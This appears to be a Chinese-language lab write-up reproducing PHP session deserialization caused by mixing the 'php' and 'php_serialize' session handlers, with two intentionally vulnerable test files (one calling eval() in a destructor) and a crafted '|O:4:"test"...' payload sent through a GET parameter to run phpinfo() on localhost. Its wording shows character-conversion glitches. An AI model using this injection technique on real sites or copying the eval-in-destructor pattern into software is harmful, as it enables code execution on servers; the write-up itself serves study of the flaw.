PHP SESSION反序列化本地樣例分析

PHP SESSION反序列化本地樣例分析

0X00漏洞緣由

主要緣由是： ini_set(‘session.serialize_handler’, ‘php_serialize’);

　　　　　　　ini_set(‘session.serialize_handler’, ‘php’);

　　　　　　　二者處理session的方式不一樣。

0X01漏洞分析

若是在PHP在反序列化存儲的$_SESSION數據時使用的引擎和序列化使用的引擎不同，會致使數據沒法正確第反序列化。經過精心構造的數據包，就能夠繞過程序的驗證或者是執行一些系統的方法

0X02漏洞環境

Windows10

Phpstudy一件集成環境

0X03漏洞復現

首先如今本地phpstudy網站根目錄新建倆個測試用例1.php和2.php

內容分別爲

1.php：

<?php
ini_set('session.serialize_handler', 'php');
session_start();
class test {
    var $hi;
    function __construct(){
        $this->hi = 'phpinfo();';
    }

    function __destruct() {
         eval($this->hi);
    }
}
?>

2.php：

<?php ini_set('session.serialize_handler', 'php_serialize'); session_start(); $_SESSION["test"]=$_GET["a"]; ?>

漏洞利用

首先構造反序列化字符串:O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}

能夠看到2.php中接收的參數爲a

提交2.php?a=|O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}，

也就是訪問127.0.0.1\2.php?a=|O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}，

訪問後結果以下：

而後再訪問http://127.0.0.1/test1.php,成功執行phpinfo()

0X04漏洞分析

提交2.php?a=|O:4:「test」:1:{s:2:「hi」;s:10:「phpinfo();」;}，

傳入的數據會按照php_serialize來進行序列化：a:1:{s:4:"test";s:43:"|O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}";}

此時訪問1.php，應用程序會按照php來反序列化SESSION中的數據，此時就會反序列化僞造的數據，php引擎會以|做爲做爲key和value的分隔符，那麼就會將a:1:{s:4:"test";s:43:"做爲SESSION的key，將O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}";}做爲value，而後進行反序列化，最後就會就會實例化test對象，最後就會執行析構函數中的eval()方法。